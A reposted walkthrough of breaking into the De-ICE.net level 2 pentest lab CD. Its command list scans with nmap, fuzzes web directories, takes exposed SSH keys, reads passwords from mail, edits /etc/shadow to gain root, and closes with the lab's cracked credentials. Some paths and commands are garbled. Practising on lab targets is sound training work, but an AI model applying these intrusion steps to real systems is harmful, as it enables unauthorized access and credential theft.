HOWTO : De-ICE.net v2.0 (1.100) {Level 2 - Disk 1}

*** Do NOT attack any computer or network without authorization or you may put into jail. ***



Credit to : g0tmi1k



This is g0tmi1k's work but not mine. I re-post here for educational purpose only. It is because I enjoy his videos very much and I am afraid of losing them.



The original post at here



Links



Watch video on-line

Download video



What is this?



This is my walk though of how I broke into the De-ICE.net network, level 2, disk 1.



The De-ICE.net network is on a "live PenTest CD", that creates a target(s) on which to practise penetration testing; it has an "end goal" to reach.



What do I need?



BackTrack 4 (Final)

de-ice.net-2.100-1.1.iso (MD5: 09798f85bf54a666fbab947300f38163)

Dictionary(s)



Software

Name: De-ICE.net

Version: 2.0 (Level 1 - Disk 2 - IP Address: 1.100)

Home Page: http://www.de-ice.net or http://heorot.net/livecds/



Download Link:



http://heorot.net/instruction/tutorials/iso/de-ice.net-2.100-1.1.iso

http://www.mediafire.com/file/uyecnhvkeije0br/de-ice.net-2.100-1.0.part1.rar

http://www.mediafire.com/file/l2ezefrg05mmtrr/de-ice.net-2.100-1.0.part2.rar



Forums/Support: http://forums.heorot.net and http://forums.heorot.net/viewtopic.php?f=18&t=16

WiKi/Support: http://de-ice.net/hackerpedia/index.php/De-ICE.net_PenTest_Disks



Commands



nmap -n 192.168.2.1-255



nmap -n -sV -sS -O 192.168.2.100



nmap -n -sV -sS -O 192.168.2.101



firefox 192.168.2.100



[+]kate -> list of possible usernames. Save. Filename: usernames.txt



firefox 192.168.2.101



[+]BackTrack -> Vulnerability Identification -> Fuzzers -> JBroFuzz. Web Directories -> List of usernames (+ root, admin) with '~' infront. -> http://192.168.2.101 -> 80







firefox http://192.168.2.101/~pirrip



[+]kate -> Update usernames with the ones which we got a respond from. Save.



[+]BackTrck -> Web Application Analysis -> Web (frontend) -> nikto2



./nikto.pl -host 192.168.2.101 -r ~pirrip/ -Display 124



firefox http://192.168.2.101/~pirrip/.ssh



// Save both files



mv /root/id_rsa /http://root/.ssh/id_rsa



mv /root/id_rsa.pub /http://root/.ssh/id_rsa.pub



chmod 000 /http://root/.ssh/id_rsa



chmod 000 /http://root/.ssh/id_rsa.pub



ssh pirrip@192.168.2.100

// Yes



mailx

// 3 - we see that havisham passowrd is 'changeme'. 7 - we seen pirrip password is '0l1v3rTw1st'



cd /etc/



vi passwd



// kate -> Update usernames with only valid ones.



vi group



sudo vi shadow

// edit (D, :22,22y, :put, i, root, ESCape, ESCape, d + [->],[up],d d). Save it (:w), exit (:q). Password: 0l1v3rTw1st



su

// Password: 0l1v3rTw1st



cd /root/



ls -a



cd .save/



ls -a



chmod -R 777 /root/



//In BackTrack//



scp pirrip@192.168.2.100:/root/.save/great_expectations.zip /root/



unzip great_expectations.zip



tar xf great_expectations.tar



strings Jan08



//In SSH//

sudo iv /var/mail/havisham



modprobe capability



//In BackTrack//

ftp 192.168.2.100

// Usrename: pirri. Password: 0l1v3rTw1st //



ls -a



//In SSH//



exit





//In BackTrack//



[+]Firefox -> Send a REAL email to: philip.pirrip.ge@gmail.com

// GAME OVER



----------------------------------------------------------------------------------------------------

Users

root:P1ckw1ckP@p3rs root:$1$/Ta1Q0lT$CSY9sjWR33Re2h5ohV4MX/:13882:0:::::

havisham:changeme havisham:$1$qbY1hmdT$sVZn89wKvmLn0wP2JnZay1:13882:0:99999:7:::

pirrip:0l1v3rTw1st pirrip:$1$KEj04HbT$ZTn.iEtQHcLQc6MjrG/Ig/:13882:0:99999:7:::

magwitch: magwitch:$1$qG7/dIbT$HtTD946DE3ITkbrCINQvJ0:13882:0:99999:7:::

----------------------------------------------------------------------------------------------------





Notes



Dictionaries : http://g0tmi1k.blogspot.com/2010/02/site-news-isos-and-dictionaries.html



That's all! See you.